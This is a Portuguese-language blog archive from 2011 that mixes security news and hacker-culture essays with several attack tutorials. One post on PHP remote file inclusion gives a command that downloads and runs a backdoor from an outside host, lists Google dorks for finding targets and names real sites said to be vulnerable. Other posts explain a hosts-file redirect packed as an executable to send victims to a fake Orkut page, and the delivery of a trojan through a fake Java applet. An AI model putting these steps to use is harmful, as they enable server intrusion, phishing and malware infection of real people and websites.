Pages

quinta-feira, 28 de abril de 2011

0
Formspring é 'central de comando' de novo vírus brasileiro


A rede social Formspring, que permite aos usuários criarem páginas para que outros internautas perguntem qualquer coisa, está sendo usada como centro de controle por vírus brasileiros programados para roubar senhas de banco. A descoberta é do analista de vírus Fabio Assolini, da Kaspersky Lab.
Os comandos na página maliciosa do Formspring estão codificados e não causam nenhum dano ao internauta que vê o perfil – o objetivo é simplesmente servir de ponto de controle para o vírus. Para a maioria das pessoas, os comandos são incompreensíveis. “Quem vê o conteúdo no perfil malicioso não imagina o que pode ser e isso faz com que o perfil fique mais tempo online”, explica Assolini.
Os códigos deixados pelos criminosos nas páginas do Formspring são principalmente endereços dos quais o vírus deve baixar componentes adicionais – “módulos” que acrescentam funções ou modificam o comportamento da praga para mantê-la atualizada. Outra informação que pode ser enviada ao vírus pelo Formspring é o endereço do banco de dados para o qual o vírus deve enviar as informações bancárias coletadas.
Um contador que registra o número de pessoas infectadas pela praga também é acionado pelos comandos.
O analista da Kaspersky afirma que há vantagens para os criminosos usarem o Formspring: o serviço é gratuito, não cai com frequência e, como os comandos estão codificados, ficarão lá por bastante tempo. Mas o novo comportamento do vírus é reflexo de uma tendência. “Os criminosos digitais brasileiros estão percebendo que ter total controle sobre a praga e sobre a máquina da vítima por um longo tempo é mais lucrativo do que simplesmente infectar e roubar os dados apenas uma vez”.
Assolini ainda pensa que, no futuro, os vírus brasileiros também irão formar redes zumbis – uma prática mais comum em outros países da América Latina do que no Brasil.
Procurado pela reportagem, o Formspring ainda não informou se está ciente dos vírus que usam seu serviço como centro de controle. Vale observar, porém, que uso do serviço dessa forma pelos criminosos não torna o uso da rede social mais perigoso – é apenas uma facilidade para os programadores de vírus, que não precisam manter sua própria infraestrutura de controle.
Uso de redes sociais como centro de comando
Pragas brasileiras já usaram outras redes sociais como centro de comando. A prática foi registrada pela primeira vez em 2009 no Twitter, quando perfis maliciosos eram abastecidos com tuites codificados que traziam os comandos para o vírus.
Assim como o trojan que usa o Formspring, essa praga acessava o perfil no Twitter para buscar atualizações e instruções do seu criador.

Fonte: G1
segunda-feira, 25 de abril de 2011

1
Hacker, Geek, Nerd... Hein?

O artigo foi tirado do GlobalExchange.com, escrito por Christian Matsuy:

- Você trabalha com que?
- Sou Administrador de Rede.
- Hein?
- Trabalho com informática...
- Sério? Você é "hacker"
- "Hacker" Depende... O que é "hacker" pra você?
- São aqueles caras que invadem e ferram os computadores dos outros...
- Ah tá... Sou sim...

Parece piada não é? Mas não é não... Isso acontece direto comigo e com muitos que trabalham com informática.

Mas... Espera um pouco... Isso não está certo...

Você tem noção do que está falando? Sabe mesmo o que é um "hacker"? Pare agora e responda pra você mesmo o que é um "hacker"?

Resolvi escrever este artigo pois, nos dias de hoje, o termo "hacker" ganhou, graças a uma opinião pública predominantemente moldada pela mídia, uma conotação totalmente negativa, que pode nem sempre corresponder à realidade.

O sentido comum que damos a este termo (próprio do final do século XX) nos remete a um universo obscuro, onde impera aquilo que é ilegal, proibido, e onde supostamente encontramos grupos de indivíduos que se dedicam à estranha atividade de invadir a privacidade dos usuários de computador e empresas, cometerem furtos e provocar danos (em vários níveis) através de sistemas.

Este conceito distorcido da realidade levou o termo "hacker" a tornar-se uma denominação geral que reporta a todos os delinqüentes de informática, sem que se leve em conta quaisquer parâmetros de quais sejam os objetivos e as formas de atuação destes indivíduos. Desta forma, tende-se a generalizar os chamados "piratas cibernéticos" com a denominação "hacker", o que criou um clima desconfortável, publicado em vários sites na Internet em forma de protesto por aqueles que afirmam ser os verdadeiros "hackers".

Então, o que é um "Hacker"?
"Hacker" é uma palavra inglesa que não possui tradução exata para a língua portuguesa. O mais próximo que conseguimos chegar ao traduzi-la seria "fuçador" ou "aquele que aprende fuçando". O sentido da palavra é muito próximo a outro termo, "autodidata", mas não é exatamente isto, já que o "fuçador" vai bem mais longe que o autodidata, pois existe a curiosidade em descobrir como dominar tudo, buscando o conhecimento das falhas dos sistemas, depois como usá-las para burlar proteções, e depois como "consertá-las".

No mundo real qualquer um de nós pode ser considerado "hacker" em alguma coisa: Basta pensarmos naquilo que resolvemos por conta própria, quando somos "curiosos" e procuramos entender a origem do problema (até após a leitura de literaturas específicas) e vamos pelo método de tentativa e erro. Nós sabemos que a tentativa e erro é a forma mais demorada para se resolver problemas, mas sem dúvida é a melhor, pois nos leva a compreender processos "ocultos" que seriam desconhecidos ou não seriam ensinados em livros e nem mesmo por outras pessoas.

Portanto ninguém se torna um "hacker" de uma hora pra outra. Quando pensamos que no mundo real muitos deles nunca terão acesso a um computador soa estranho, não? Sim, e vai muito além disso. Talvez "hackers" apenas sejam assim.

"Hackers" são pessoas inquietas que não são facilmente convencidas por argumentos de autoridade sem valor técnico. São céticos sempre prontos a duvidar de qualquer coisa. A simples menção de que algo é impossível para um "hacker" é um poderoso convite para que ele tente fazê-lo.

Eles querem saber mais sobre tudo, mais ainda sobre informática, simplesmente pelo fato de saber... Para muitos, obter "iluminação pessoal". Na nossa sociedade atual construíram um mundo virtual em que a única coisa que faz diferença é sua confiabilidade e sua capacidade técnica.

Esqueça a imagem do "nerd" (ou "geek", termo muito usado em informática para denominar uma pessoa com talento e interesse por tecnologia e programação acima do normal) que você possa criar na sua mente.

É verdade, alguns "hackers" são geeks (como se isso fosse algo ruim), assim como alguns não-"hackers" também são, mas de um modo geral eles são pessoas comuns, que andam como você na rua, e que falam abertamente sobre seus assuntos e interesses (muitas vezes não percebendo que os demais não estão entendendo absolutamente nada).

A diferença é que, nesse mundo, o fato de ser um geek ou não simplesmente não importa, ao contrário da sociedade de costumes, onde essas coisas tendem a ser supervalorizadas.

Filosofia à parte, vou ser mais objetivo:

É simples: Como na matemática ou na física! Você pode decorar aquelas infinitas fórmulas e, se tiver uma boa memória, vai passar em qualquer exame final. Mas você pode também deduzir de onde aquelas fórmulas saíram e o que seus criadores pensaram para chegar até elas.

Talvez você não se saia tão bem nos exames finais, mas quem aprendeu mais? O que decorou ou o que compreendeu?

0
The Hacker Manifesto - The Mentor (1986)

Mais um foi pego hoje, está em todos os jornais. "Adolescente Preso em Escândalo de Crime de Computador", "Hacker preso depois que o banco foi adulterado" ...
Malditas crianças. Eles são todos iguais.
Mas você em sua psicologia de três ângulos em 1950, sempre dar uma olhada por trás dos olhos de um hacker? Você já se perguntou o que o fazia, o que as forças lhe formam, o que pode ter moldado a ele?
Eu sou um hacker entrando no meu mundo ...
O meu é um mundo que começa na escola ... Eu sou mais esperto que a maioria dos outros garotos, alem de esta bosta que nos ensinam me chateia ...
Malditos fracassados. Eles são todos iguais.
No ensino médio e no ensino fundamental, eu ouvi os professores explicarem pela qüinquagésima vez como reduzir uma fração. Eu entendo isso. "Não, Sra. Smith, eu não mostrei o meu trabalho. Eu fiz isso na minha cabeça ..."
Maldito garoto. Provavelmente copiou. Eles são todos iguais.
Eu fiz uma descoberta hoje. Eu encontrei um computador. Espere um segundo, isso é legal. Ele faz o que eu quero. Se ele comete um erro, é porque eu estraguei isto. Não porque não gosta de mim ... Ou se sente ameaçado por mim ... Ou pensa que eu sou inteligente ... Ou não gosta de ensinar e não deveria estar aqui ...
Maldito garoto. Tudo que ele faz é jogar. Eles são todos iguais.
E então aconteceu ... uma porta aberta para um mundo ... correndo pela linha telefônica como heroína pelas veias de um viciado, uma pulsação eletrônica é enviada, um refúgio para a incompetência do dia-a-dia é procurado ... uma placa foi encontrada. "Este é ... este é o meu lugar ..."
Eu sei que todos aqui ... mesmo se eu nunca conheci eles, nunca conversei com eles, nunca pode ouvi-los novamente ... Sei que todos vocês ...
Maldito garoto. Amarrando-se a linha telefônica novamente. Eles são todos iguais ...
Pode apostar que somos todos iguais ... temos sido alimentados com colher de comida de bebê na escola quando nossa fome é de bife ... os pedaços de carne que você deixou passar foi pre-mastigado e sem gosto. Nós fomos dominados por sádicos ou ignorados pelo apático. Os poucos que tiveram algo a ensinar os alunos dispostos nos encontraram, mas esses poucos são como gotas de água no deserto.
Este é nosso mundo agora ... o mundo do elétron e do switch, a beleza do baud. Nós fazemos uso de um serviço já existente sem pagar por aquilo que poderia ser baratíssimo se não fosse usado por gulosos aproveitadores, e vocês nos chamam de criminosos. Nós exploramos ... e vocês nos chamam de criminosos. Nós buscamos por conhecimento ... e vocês nos chamam de criminosos. Nós existimos sem cor, sem nacionalidade, sem preconceito religioso ... e vocês nos chamam de criminosos. Você constrói bombas atômicas, vocês fazem guerras, você assassina, engana, e mentem para nós e tentam nos fazer acreditar que é para nosso próprio bem, contudo nós somos os criminosos.
Sim, eu sou um criminoso. Meu crime é a curiosidade. Meu crime é julgar as pessoas pelo que elas dizem e pensam, não como eles se parecem. Meu crime é ser mais inteligente que você, algo que você nunca vai me perdoar.
Eu sou um hacker, e este é meu manifesto. Você pode parar este indivíduo, mas você não pode parar todos nós ... afinal, somos todos iguais.

O Mentor, Escrito em 8 de janeiro de 1986
segunda-feira, 18 de abril de 2011

0
FBI consegue autorização para desativar vírus em PCs de vítimas

A justiça norte-americana concedeu ao FBI uma autorização para atuar diretamente nos computadores das vítimas de uma rede zumbi conhecida como Coreflood. A autorização permite à polícia criar um novo servidor de Comando e Controle (C&C) que irá enviar aos sistemas infectados uma ordem para desativar a praga, efetivamente impedindo sua operação, pelo menos até reiniciar o PC.

Esta é apenas a segunda ação do gênero no mundo. A primeira ocorreu na Holanda, quando a polícia colocou nos PCs das vítimas uma página informando que o computador estava infectado. Na ocasião, a ação, que foi contra a rede zumbi conhecida como Bredolab, gerou polêmica – especialistas questionavam a autoridade do Estado para agir diretamente sobre os sistemas das vítimas, sem o consentimento das mesmas.

O mesmo tipo de questionamento está se fazendo agora. Mas a decisão que permite ao FBI enviar os comandos aos vírus também limita a operação aos computadores cuja localização “pode ser razoavelmente determinada como sendo os Estados Unidos”. Isso significa que nada vai mudar para os brasileiros infectados, por exemplo.

“O caso e a ordem são muito interessantes porque demonstram limitações de jurisdição”, comenta o advogado especializado em direito digital Marcel Leonardi. “Do ponto de vista prático, seria muito bom se mundialmente fosse possível alcançar todos os computadores e desativar a praga, mas isso, de fato, poderia ser visto como algo excessivo por não obedecer à soberania dos outros países”, explica.

Leonardi afirma que uma ação semelhante seria possível no Brasil, desde que também seja limitada aos computadores em território nacional. No Brasil, no entanto, os vírus mais comuns são ladrões de senha e a maioria carece de um centro de controle que pudesse ser usado para essas ações.

Para o pesquisador de segurança Ronaldo Castro de Vasconcellos, a ação é bem-vinda. “Ter uma máquina infectada deixou de ser uma questão meramente de desempenho ou de dados perdidos.

Deixando de lado analogias bobas com ciberguerra, de alguns anos para cá, uma máquina infectada ganhou capacidade ofensiva, como juntar-se a um ataque distribuído (DDoS) com motivações comerciais ou ideológicas, por exemplo”, afirma Vasconcellos.

Para o pesquisador, desde que a polícia tenha obtido uma ordem judicial para realizar a tarefa e que o comando enviado às máquinas infectadas se limite ao proposto – desativar o vírus – não há problema.

Há quem questione, porém, argumentando a existência de fatores imprevisíveis que podem fazer com que a desativação do vírus seja nociva ao computador. No entanto, a maioria dos bots que formam as redes zumbis – que permitem ao criminoso controlar todas as máquinas – tem, sim, uma função de autodestruição ou semelhante que muitas vezes não causa danos ao computador e é completamente funcional. Há, porém, funções de autodestruição que servem como “queima de arquivo”, eliminando todos os dados possíveis do disco rígido.

O Coreflood, no entanto, não parece ter essas características. Acredita-se que, em seus 10 anos de operação, o vírus e seus derivados tenham infectado mais de dois milhões de computadores, a maioria deles nos Estados Unidos, e realizado fraudes cujos valores somam US$ 100 milhões.

Polêmica e jurisdição

O caso destaca as limitações do atual sistema judiciário em lidar com problemas cada vez mais globais de forma local, embora também sirva como história de sucesso para novas operações no futuro.

As ações de redes zumbis são globais – um computador infectado no Brasil pode ser usado para um ataque a qualquer outro país do mundo, ou servir como escudo para o verdadeiro criminoso, complicando a realização de investigações – que precisam percorrer diferentes legislações.

No entanto, é pouco provável que isso mude em breve – a internet não parece ter criado nos países a consciência da cooperação, mas sim elevado discussões sobre soberania e o medo de que leis consideradas absurdas em outros países possam vir a valer mundialmente caso essa cooperação seja realizada, ao ponto que mesmo as ações mais bem intencionadas precisam ter seu alcance limitado.

0
Novo Domínio '.xxx' em funcionamento

Este resumo não está disponível. Clique aqui para ver a postagem.

1
Baixar arquivos a 105 Mbps ? - Sonho distante para nós Brasileiros

A Comcast Corporation, empresa de telecomunicação e entretenimento norte-americana, anunciou ontem (14) o lançamento oficial do Extreme 105 – serviço de acesso à internet de banda larga que disponibilizará 105 Mbps de velocidade em download e 10 Mbps para upload.

O pacote de conexão será comercializado, neste primeiro ano, por US$ 105 mensais. A organização começará implantando a rede nas regiões que são os seus maiores mercados. Entre as áreas contempladas, estão São Francisco, Seattle, Portland, Denver, Chicago, Miami, Washington, Filadélfia e boa parte de Boston.

A velocidade de download oferecida é muito superior à das redes brasileiras, que em média ficam próximas a 2 Mbps. Com a conexão da Comcast é possível baixar vídeos de alta definição em poucos minutos ou segundos, dependendo do tamanho do arquivo.

"Com isso, estamos alimentando a casa digital do futuro, com famílias inteiras usando vários dispositivos – computadores portáteis, consoles de jogos, comprimidos, smartphones –, permitindo que todos possam tirar proveito da alta largura de banda em aplicações simultaneamente e garantindo que cada um tenha uma ótima experiência online", comentou Cathy Avgiris, vice-presidente e gerente de comunicação e serviços de dados da empresa.



Fonte: Baixaki
quinta-feira, 14 de abril de 2011

0
O Fim das Dúvidas sobre PHP injection

Bom, muita gente tem duvidas sobre PHP Injection, provavelmente a vulnerabilidade mais comum entre defacers/owners.
A vulnerabilidade acontece por desconhecimento do webmaster, ou por distração, eles colocam 'includes' para ajudar na criação do seu site sem fazer nenhuma verificação das 'strings'
Um exemplo de um site vulneravel, com 3 partes em uma tabela:

include('topo.php');
include('menu.php');
include($page);

Existem várias strings, a mais comum é page..
Então um endereço ficticio: http://www.alvo.com.br/index.php?page=novidades.php
Neste exemplo ele carregaria a página novidades.php do site.. Se ela for vulneravel dá para 'injetar' páginas maliciosas que executam comandos na maquina que roda o site (por isso o nome PHP Injection)

Estarei usando esse script como referencia (chamado de cmd):

http://kmzrox.by.ru/cmd.gif?&cmd=ls
Obviamente você tentaria: http://www.alvo.com.br/index.php?page=h ... if?&cmd=ls
Ops! Se a página for vulneravel ela vai carregar! Se ela funcionar e não estiver em safe mode (uma opção do php.ini) vai listar os arquivos do site (comando ls).
Não é só isso, a partir daqui você usa a sua criatividade, rodar backdoor para ter acesso remoto (por telnet/putty), pacotar pessoas e servers, configurar psybnc, etc.. Só precisará saber alguns comandos de Linux/FreeBSD/SunOS..

Backdoor: kmzrox.by.ru/r0nin
Para usar coloque no 'cmd' cd /tmp;wget kmzrox.by.ru/r0nin;chmod 777 r0nin;./r0nin
entra na pasta tmp, baixa a backdoor (exploit), coloca permissão para o arquivo e roda ele
Por exemplo: http://www.alvo.com.br/index.php?page=h ... in;./r0nin

Se tudo ocorrer bem e não tiver firewall agora vá iniciar > executar > telnet http://www.alvo.com.br 1666, pronto, você está na maquina, enjoy! :~)

Para procurar no google as páginas separei uma lista de chaves, lembrando que você pode usar inurl:".pt" (escolhendo a classe do dominio) para procurar páginas somente de um país.

allinurl:".php?page="
allinurl:".php?inc="
allinurl:".php?body="
allinurl:".php?main="
allinurl:".php?pag="
allinurl:".php?p="
allinurl:".php?content="
allinurl:".php?cont="
allinurl:".php?c="
allinurl:".php?meio="
allinurl:".php?x="
allinurl:".php?cat="
allinurl:".php?site="
allinurl:".php?m="
allinurl:".php?do="
allinurl:".php?x="
allinurl:".php?content="
allinurl:".php?pagina="
allinurl:".php?root="
allinurl:".php?include="
allinurl:".php?open="
allinurl:".php?visualizar="
allinurl:".php?conf="

Achará varios sites, a maioria no padrão:

http://www.interreg3c.net/sixcms/list.php?page=home_en 
http://www.ourdocuments.gov/content.php?page=milestone 
http://www.safer-networking.org/index.php?page=mirrors 
http://www.serviceandinclusion.org/inde ... e=nat_conf 

Agora é simples, você tem os sites pra procurar e uma cmd, agora é só ir de página em página substituindo os valores da string page para o cmd que vai usar :}
Você pode utilizar exploits para tentar conseguir root (super user) na máquina, assim ter permissão para fazer TUDO com os sites que estão dentro dela, apagar todos os logs, etc.
Aqui vai uma lista de páginas vulneraveis (depois de ler isso vocês já saberão o que fazer), a maioria está protegida ou com firewall, é só para mostrar o que vai acontecer quando uma página é vulneravel :~)

http://www.imobmarques.com.br/pagina.php?pagina= 
http://www.effectingchange.luton.ac.uk/ ... p?content= 
http://www.tourtrans.ru/index.php?page= 
http://www.iobchody.unas.cz/index.php?page= 
http://www.balustrady.cz/index.php?page= 
http://www.kubela.iglu.cz/index.php?inc= 
http://www.engelking-elektronik.de/index.php?main=valor 
http://www.mob.hu/cgi-bin/index.php?main=valor 
http://www.medianlg.hu/index.php?site= 
http://www.spillo.it/home.php?main= 
http://www.fdf-k22.dk/index.php?main= 
http://www.astro.up.pt/investigacao/con ... .php?page= 
http://www.nyinvestmentproperties.com/index.php?main= 
http://www.timetoupgrade.us/index.php?main= 
http://www.msgames.msu.ac.th/reading.php?page= 
http://www.mobilink.com.tr/index.php?page= 
http://www.slh.org.tw/tw/index.php?page= 
http://www.climb.idv.tw/index.php?page= 
http://www.azsrc.com/index.php?page= 


Páginas com passthru() bloqueados, quando não aparece nada na box são ignorados, pode continuar procurando :B

Fonte: Dark

0
Brincando com o arquivo Host da Vitima

Primeiro vamos a onde esta o arquivo hosts.
Copie e a abra ele em um bloco



embaixo de 127.0.0.1 localhost
adcione o ip da pagina que vc quer direcionar e coloque o endereço da pagina
como no ex:200.176.3.142 http://www.orkut.com

feito isto adcione o arquivo em um winrar

- va na opção sfx
- opções avançadas do sfx

e va prenchendo conforme a imagems



depois e so dar ok
ele vai gerar um executavel em que no propio winrar da a opção de
altera o ícone, mais isto já e outra conversa.

Ao executar ,quando vc digitar o endereço por ex: do orkut
ele vai direcionar para o terra.

Tambem podia redirecionar para a sua fake do orkut ,assim escrevia o endereço verdadeiro e redireçionava para a fake com o endereço verdadeiro hehehe ,para tudo é preçiso imaginação ,pessoal se pensarmos um pouco existe milhares de maneiras de se enganar um utilizador.

0
Hacker deixa nome e e-mail ao invadir site

O site da Rapid Action Battalion (RAB), uma tropa de elite anticrime e antiterror do governo de Bangladesh, foi invadido no dia 5 deste mês por Shahee Mirza, hacker que protestou contra a falta de recursos para o desenvolvimento da tecnologia no país.

Ele e outros 3 comparsas foram presos em menos de 24 horas porque Mirza deixou seu nome e e-mail na página.

0
Serviço de blog gratuito Wordpress sofre invasão de hackers

Invasores conseguiram acesso total a “vários servidores” do serviço de blogs Wordpress, de acordo com um comunicado escrito por Matt Mullenweg, responsável pelo serviço. “Potencialmente qualquer coisa nesses servidores pode ter sido revelada”, escreveu. A Automattic, que opera o serviço, ainda está investigando como a invasão ocorreu e quais dados podem ter sido revelados, mas afirma já ter tomado medidas para prevenir novos incidentes.

Nas palavras Mullenweg, os atacantes conseguiram “acesso root”. “Root” é o nome do usuário administrador de sistemas Unix, normalmente usado em servidores, e é capaz de realizar qualquer tarefa no sistema.

De acordo com as estatísticas do próprio Wordpress.com, o serviço hospeda 19 milhões de blogs.

Códigos do software usado no site teriam sido expostos. Boa parte do Wordpress é código aberto e está disponível para download na internet, mas códigos próprios do Wordpress, que Mullenweg disse serem “sensíveis”, também foram revelados. Códigos de parceiros do WordPress.com também estariam comprometidos.

O site não ofereceu sugestões a seus usuários, além de “sempre usar uma senha forte”, “usar senhas diferentes para sites diferentes” e “se você usou a mesma senha para sites diferentes, troque para algo mais seguro”.

As recomendações não são claras, mas o tom deixa a entender que senhas de usuários poderiam ter sido reveladas, pelo menos parcialmente. Seria recomendável trocar as senhas do próprio WordPress e de serviços em que o usuário usou a mesma senha do serviço de blogs ou que foram ligados com o serviço.

No início do ano, o serviço de hospedagem de programas de código aberto Sourceforge também sofreu uma invasão semelhante.

Fonte: G1
segunda-feira, 11 de abril de 2011

1
iPhone 4 estaria espionando usuários

O fórum de discussões da Apple tem recebido relatos de que o FaceTime do iPhone 4 estaria capturando imagens sem o consentimento dos usuários. Segundo reporte de um usuário do gadget, uma foto desconhecida apareceu durante uma chamada no software de videoconferências do aparelho.

“Eu e meu namorado experimentamos o acontecido várias vezes – Quando um de nós chama o outro através do FaceTime, uma imagem antiga aparece congelada na tela, enquanto aquele que recebe a chamada vê apenas uma tela preta. É bastante assustador, porque ele trouxe até fotos de nós trabalhando, onde utilizamos o FaceTime algumas vezes, mas nunca entre nós dois. Não é terrivelmente inconveniente, mas é definitivamente inquietante, já que aparecem imagens de lugares que nós nunca tiramos fotos ou sequer usamos o FaceTime”, comentou uma usuária no mês passado.

O motivo das imagens armazenadas sem o conhecimento dos usuários ainda não foi explicada pela empresa. Não se sabe se as fotografias foram capturadas intencionalmente, devido a alguma falha no sistema operacional ou apenas como consequência do buffer de chamadas anteriores. De acordo com o relato, as figuras são armazenadas apenas no dispositivo, não sendo compartilhadas com outros equipamentos ou serviços.

0
Padre diz que hackers estão em missão divina

O padre jesuíta Antonio Spadaro publicou um texto na revista La Civiltà Cattolica elogiando os hackers, as wikis e os softwares de código aberto. Na publicação, o clérigo diz que as pessoas que trabalham em codificações, aperfeiçoamento de hardware e compartilhamento de conhecimento estão em uma missão divina.

Spadaro explica que não podemos confundir hackers com crackers. "Hackers constroem coisas, crackers quebram-nas", comentou o autor ao relacionar a cultura e ética hacker com os ensinamentos do cristianismo.

Para o jesuíta, a filosofia hacker é descontraída, porém comprometida, estimula a criatividade e se opõe aos modelos de controle, concorrência e propriedade privada. “A mentalidade hacker implica utilização divertida da inteligência para solucionar problemas, rejeitando o conceito de trabalho repetitivo, pesado e estúpido”, escreveu Antonio Spadaro.

O modelo de compartilhamento de conhecimento impulsionado pela Wikipédia foi outro tema muito abordado pelo clérigo. Segundo ele, esse é um exemplo de rede intelectual que foi capaz de transformar a própria ideia de produção cultural.

"Para criar a maior enciclopédia colaborativa da internet, estima-se que foram gastas cerca de 100 milhões de horas de trabalho intelectual, que é o equivalente ao tempo que os cidadãos dos EUA passam vendo publicidade na TV em um único fim de semana", comentou o padre jesuíta.



Leia mais no Baixaki: http://www.tecmundo.com.br/9533-padre-diz-que-hackers-estao-em-missao-divina.htm#ixzz1JEggJgb9

1
Vírus no Facebook infecta mais de 60 mil usuários

Para quem possui uma conta no Orkut, a opção “visualizar quem acessou meu perfil” é mais do que conhecida, permitindo a você controlar sua conta e conferir quem é o bisbilhoteiro (ou amigo) que está acessando as informações da página.

Portanto, nada mais comum do que um aplicativo capaz de executar essa mesma opção no Facebook. Todavia, a empresa de segurança Sophos afirma que o serviço, exatamente com o intuito de oferecer o mesmo serviço do Orkut é, na verdade, um vírus que está se alastrando pela rede social.

O aplicativo “Who Views your profile” já infectou mais de 60 mil contas, que recebiam marcações em fotos e eram convidadas a acessar o link do serviço. A mensagem maliciosa era a seguinte: “OMG. I cant believe this actually works! Now you really can see who viewed your profile!” ou, em uma tradução livre “Meu Deus! Eu não acredito que isso realmente funciona! Agora você realmente pode saber quem visualizou seu perfil!”.

Ao fornecer seu login e senha, você deveria ter acesso ao aplicativo e poderia, enfim, conferir quem havia acessado sua página. Ao invés disso, o aplicativo recolhia informações pessoais, espalhando-se também por sua rede de amigos.

Nunca é demais alertar que você deve ter muito cuidado com os links que aparecem em redes sociais, ainda mais aqueles que você não conhece. Além disso, fique de olho no nome do aplicativo, quem usa o programa e qual mensagem aparece em sua Feed de novidades, para não ser vítima desse tipo de golpe. Pelo menos, o link da "página do programa" não está mais disponível no site do Facebook.
sexta-feira, 8 de abril de 2011

0
Mortal Kombat 9 terá batalhas em equipe

Foi divulgado mais um trailer com novidades do novo Mortal Kombat, que será lançado para Xbox 360 e PlayStation 3 no dia 19 de abril. O vídeo mostra uma nova jogabilidade do game de luta, o chamado Team Match - ou "batalha em equipe". Neste modo, dá para incluir diversos personagens simultaneamente na pancadaria, lutando de dois em dois. No caso, o trailer mostra Kitana, Milena, Sindel e Jade em uma luta eletrizante.

Confira o vídeo!





A Warner Games, desenvolvedora do jogo, já havia divulgado outros vídeos com novidades do Mortal kombat 9. Kratos, o fantasma de Esparta em God Of War, estará disponível no modo "versus" do jogo de luta. Além disso, o Mortal Kombat traz a chamada Challange Tower, modalidade em que jogador terá que cumprir determinadas missões, como lutar com um personagem sem os braços ou passar em testes de sorte e memória, totalizando 300 missões. Outra novidade são os X-Ray Moves - golpe tão violento que dá para ver um Raio X do oponente atingido, avaliando os danos.

Confira os X-Ray Moves de Johnny Cage!

0
Links encurtados [ Perigo Real ]

Exceto os muito recém-chegados à rede, todo internauta sabe que não deve clicar em anexos ou links que não pediu, que deve desconfiar de mensagens ou sites que prometem vídeos inéditos de um fato muito noticiado (tsunami no Japão, por exemplo), ou cenas íntimas de celebridades. Ainda mais quando para assistir ao vídeo é preciso baixar algo. São estratégias usadas por golpistas para instalar códigos maliciosos no computador ( popularmente chamados “vírus”, para horror dos técnicos), no intuito de roubar informações bancárias e de cartão de crédito ou assumir o controle do seu computador, usá-lo em redes de computadores zumbis (botnets) e aplicar outras fraudes.

Se a mensagem, link, arquivo, vem de um estranho, é praticamente certo tratar-se de falcatrua. Mas e quando vem de um conhecido? Segundo a Symantec, fabricante da linha Norton (programas de segurança), o internauta é menos cuidadoso e tende a confiar no arquivo enviado por uma pessoa conhecida.

Essa é uma das razões para a empresa prever mais ataques com alvos específicos, como sites muito visitados, ou redes sociais. De acordo com a Symantec, os ataques na Web cresceram 93% entre 2009 e 2010(e 42% em dispositivos móveis), impulsionados principalmente pelos encurtadores de URL, sites como bit.ly, migre.me e tantos outros que transformam endereços quilométricos em outros curtinhos. Quando há limitação de espaço, como no Twitter (140 toques), isso é essencial. O problema é: o endereço curto pode mascarar uma ameaça, como um site fraudulento que tentará invadir o computador ou induzir o internauta a permitir a invasão.

Segundo a Symantec, em 2010 foram compartilhados nas redes sociais milhões de links que levavam a fraudes “disfarçados” por encurtadores, o que aumentou significativamente o sucesso dos ataques. Que fazer, então? Manter um antivírus atualizado é a mais básica das recomendações. Há opções gratuitas (AVG, Kaspersky, Avast!), que costumam funcionar melhor em conjunto. Tecnologias da Symantec (Norton Safe Web) e da McAfee (McAfee Site Advisor) há algum tempo verificam de graça se há riscos por trás de um link, mas é preciso estar sempre muito atento antes de clicar.

2
Dois anos após divulgação, GNOME 3 é lançado para Linux




Depois de mais de dois anos de desenvolvimento e quase uma década após o segundo modelo, a terceira versão de uma das interfaces gráficas mais famosas para Linux foi finalmente lançada. O GNOME 3 já está disponível desde o dia 6 de abril para download no site oficial do produto, que conta com uma lista com todas as novidades e vídeos introdutórios ao produto.

Contando com um visual totalmente reformulado e inúmeras funções adicionais. Mesmo com tantas novidades, o ponto principal do sistema é a simplicidade aliada com a modernização gráfica, resultando em algo inovador, mas que carrega traços de sistemas operacionais de empresas como a Apple.

O que mais chamou a atenção de quem já realizou o download gratuito do produto foi o GNOME Shell, a interface propriamente dita, que deixa a navegação por sistemas Linux ainda mais simples. Mudar de uma janela para outra, manter o foco em uma atividade e iniciar seus programas favoritos ficou ainda mais fácil, por exemplo.

Entre as novidades, divulgadas desde a liberação das primeiras imagens, você vai encontrar uma variedade de aplicativos e utilitários, como um sistema de notificações, um sistema de busca no próprio desktop, uma edição de textos mais dinâmica e tradução para dezenas de idiomas, incluindo português.



Leia mais no Baixaki: http://www.tecmundo.com.br/9506-dois-anos-apos-divulgacao-gnome-3-e-lancado-para-linux.htm#ixzz1IxNfvVSx
segunda-feira, 4 de abril de 2011

0
Chefe de segurança do Xbox Live tem conta hackeada

Diretor de política e responsável por banir da rede Xbox Live aqueles que trapaceiam em games on-line, Stephen Toulouse postou no Twitter neste domingo (3) que seu domínio pessoal Stepto.com estava comprometido. A informação confirma um vídeo no YouTube que mostra a conta de Toulouse na rede Xbox Live sendo modificada.

O jovem conta no vídeo que usou engenharia social no provedor de hospedagem. Se isso for verdade, ele também obteve o acesso a todos os e-mails de Toulouse, permitindo o roubo da conta Xbox Live.

Antes de ser o chefe da segurança dos games on-line da Microsoft, Toulouse era o diretor de relações públicas do Security Response Center, a equipe responsável pela produção das atualizações do Windows.

O G1 entrou em contato com a Microsoft pedindo mais informações. Até o momento, a empresa não confirmou o ataque. Toulouse já recuperou a titularidade de seu domínio.
Descuido e motivação

O invasor identifica a si mesmo como Predator. No vídeo do YouTube em que descreve o ataque, ele deixa diversas informações suas aparecerem em janelas de mensagens instantâneas e no Facebook. Comentaristas do YouTube postaram o que pode ser o seu endereço residencial.

“Amo quando dizem que as contas do Xbox Live são seguras e que a única maneira de roubá-las é quando a vítima fornece o usuário e a senha. Como se alguém como o Stepto iria simplesmente dar a senha e o usuário para alguém”, escreveu o jovem na descrição do vídeo. “Eu ofereci minha ajuda à Xbox Live, mas eles não quiseram”.

Predator teria sido banido 35 vezes do Xbox Live, o que o motivou a fazer o ataque. Ele diz também que já teria hackeado contas do Xbox Live mediante pagamento, e faz a mesma oferta na descrição do vídeo.

Fonte: G1

1
Infectando por URL

Explicando:
- A vítima entrará no seu site. Logo após, ela receberá uma falsa notificação de "java".
- Quando ela clicar na paradinha que aparece, seu server estará sendo executado.
- Sem que ela perceba!
Bom, vou tentar encurtar o tutorial, para evitar futuras complicações.

Ferramentas necessárias:
- Um Trojan: Escolha um trojan qualquer de sua preferência.
- Um host que aceite .exe ( qualquer um do seu criterio
- Um Script em Html
- Um falso Certificado de java
- E uma animação em Flash (Opcional)

Baixe as três últimas ferramentas aqui:

Download

Com todas as ferramentas em mãos, vamos as configurações:
- Baixe os Scripts acima e abra o arquivo "index.html" com o Bloco de Notas.
(Clique com o botão direito >> Abrir Com >> Bloco de Notas)
- Localize a parte do código que contém isso:


( retire os .(pontos) de dentro das tags de abertura e fechamento )
<.applet archive="link.jar" code="Inicio.class" height="10" name="link" width="1">
